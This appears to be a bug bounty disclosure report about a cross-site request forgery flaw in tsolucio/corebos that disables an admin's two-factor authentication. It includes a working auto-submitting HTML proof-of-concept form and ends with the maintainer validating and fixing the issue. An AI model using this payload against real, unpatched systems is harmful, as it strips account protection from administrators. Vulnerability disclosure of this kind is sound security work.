We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Attacker can turn off 2FA of the Admin in tsolucio/corebos

Valid

Reported on

Sep 1st 2022

Description

The attacker can turn off the 2FA of the admin by performing the CSRF attack

Steps to reproduce

Step 1: Login as admin on the demo product and navigate to https://demo.corebos.com/index.php?module=Utilities&action=integration&_op=getconfig2fa&user_list=1

Step 2: Turn on the 2FA and close the tab

Step 3: Reopen the account 2fa section --> and verify it's still on

Step 4: Close the Tab again

Step 5: Open w3schools --> HTML editor on new tab

Step 6: Copy this code and Run

<html> 
 <body> 
 <script>history.pushState('', '', '/')</script> 
   <form action="https://demo.corebos.com/index.php"> 
     <meta name="referrer" content="no-referrer"> 
     <input type="hidden" name="module" value="Utilities" /> 
     <input type="hidden" name="action" value="integration" /> 
     <input type="hidden" name="&#95;op" value="setconfig2fa" /> 
     <input type="hidden" name="user&#95;list" value="1" /> 
     <input type="submit" value="Submit request" /> 
   </form> 
   <script> 
     document.forms[0].submit(); 
   </script> 
 </body> 
</html>

Step 7: Done

Successfully launched CSRF attack & 2FA of Admin turned off!

Impact

Turning off the 2FA of the Admin

Occurrences

(Black box testing)

References

We are processing your report and will contact the tsolucio/corebos team within 24 hours. a year ago
7h3h4ckv157
a year ago

Researcher

@Maintainer

This attack 100% working on my side. If you need any kinda assist for reproducing the issue, feel free to open the ticket by pinging me. Or you need a video demonstration, that'll also be provided

Happy to help!

cheers

We have contacted a member of the tsolucio/corebos team and are waiting to hear back a year ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a year ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. a year ago
7h3h4ckv157
a year ago

Researcher

I wish you don't miss this @Maintainer

7h3h4ckv157
a year ago

Researcher

@admin

From the last notification > We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. (2 days ago)

Is that meant, the report will no more considering??

Ben Harvie
a year ago

Admin

Hi Kiran PP,

This report will still be available to the maintainer to validate, however, we will no longer be sending notifications to the maintainer to remind them to do so.

Joe Bordes validated this vulnerability 4 months ago
7h3h4ckv157 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes marked this as fixed in 8 with commit 2e415f 4 months ago
Joe Bordes has been awarded the fix bounty
This vulnerability has been assigned a CVE
Joe Bordes published this vulnerability 4 months ago
index.php#L0 has been validated
to join this conversation